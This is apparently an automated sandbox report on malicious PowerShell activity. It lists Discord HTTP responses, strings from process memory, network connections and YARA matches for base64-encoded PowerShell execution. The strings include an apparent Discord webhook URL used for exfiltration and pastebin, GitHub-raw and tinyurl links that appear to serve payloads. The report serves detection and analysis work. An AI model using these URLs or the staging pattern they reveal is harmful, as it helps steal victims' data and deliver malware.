Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:38 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000840x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cub%2FLRgLACco1CFNH9Q9AmckyywIt1%2BhfywRakNHRkEM%2Fk0UUVj7%2FB2NAytGN8ysw45uQ2cj0fepkrPy2yqV6AH0tjs9XplDLW62cRmyc3%2B5gvEA87fU%2FqhQFlEK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=XRs7R23fkRnrXQRBTIVDR3Mx4Pp6hStSK7yD5KtZGmE-1729000838909-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30562a7e982e66-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:38 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1729000840x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqdOiyxqP9WV6kqIVh%2B5GCuOIqE00aCHn6eB40YB1BB9geKJipNhOdqwNJ2v6snbPVw1QCRaxAyACQI3aiUlPKUb5FN82%2FE91IyQ0mMwPxd4u4YjfM9OBY4SVQRZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=yEOotwkWt1dVal8F_cF0I.SDW0zDBw1WL7y6Ggktvek-1729000838959-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30562adb78e76a-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:56 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000858x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6y58N4G5xhAgAclsfELCL4vYMRL1dKLmEvZXbltV4xX19%2FhCtyXpYRGPBjcKQ5TtSYREctGH3loQD%2BPgaBAbSgrIHIQuhaS4fs00DsgobwUohjmmH%2BmdDlm2kXPO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=d07a2d7a7b163eb2bc363103be6664bc28dedd8c-1729000856; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Ocy6fJkJWJMC268ZWVFfxA560vcYtEIVLj3zT5Ch5e4-1729000856906-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30569aef302e4f-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:01:03 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000864x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8LReTUnDSklWN7n3iLQZ47m8pDvQX5LtLL8aaRSBCMArXkzeFEPdeyEIZYkR8FZknc4iaJ7BLYKWhcNSOWj1wHubkLuzLZuu6bRaQEdruclb7HAj2SnqHt5lz3i5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=19b26d61e8d421bc0ea94327663eea862e775528-1729000863; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=sM1EwP2ChVVZeJ5tLOr_.50bQMwiRTG113ZViG8DWmM-1729000863431-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3056c3cf0ae82f-DFW
Source: powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cicro.com
Source: powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1650878851.0000019381628000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B456C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752875000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000018.00000002.2026955387.000001B752875000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1650878851.0000019380225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019381608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B41D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B454A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com
Source: powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com/yeykydun
Source: powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.1761764309.00000193E8BBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364535890.000002152C3C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.1650878851.0000019380448000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757A40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000007.00000002.1650878851.000001938174E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B469A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514D4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.comP
Source: powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B37D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000D.00000002.1652165646.00000247578C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.1652165646.00000247578C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.comp6
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000007.00000002.1650878851.000001938164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019381628000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B456C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B4590000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3310000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B75281D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comx
Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52155
Source: unknownNetwork traffic detected: HTTP traffic on port 52049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52114
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 52155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52203
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52050
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 52206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52050 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52049 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52102 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52104 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52114 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52125 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52155 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52206 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_6448.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7172.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7180.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7352.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5844.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_4240.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6448, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7172, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7180, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5844, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4240, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB53C7327_2_00007FFAAB53C732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB53B9867_2_00007FFAAB53B986
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB5361B17_2_00007FFAAB5361B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB51B8C020_2_00007FFAAB51B8C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB51C70220_2_00007FFAAB51C702
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB5262F020_2_00007FFAAB5262F0
Source: amsi64_6448.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7172.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
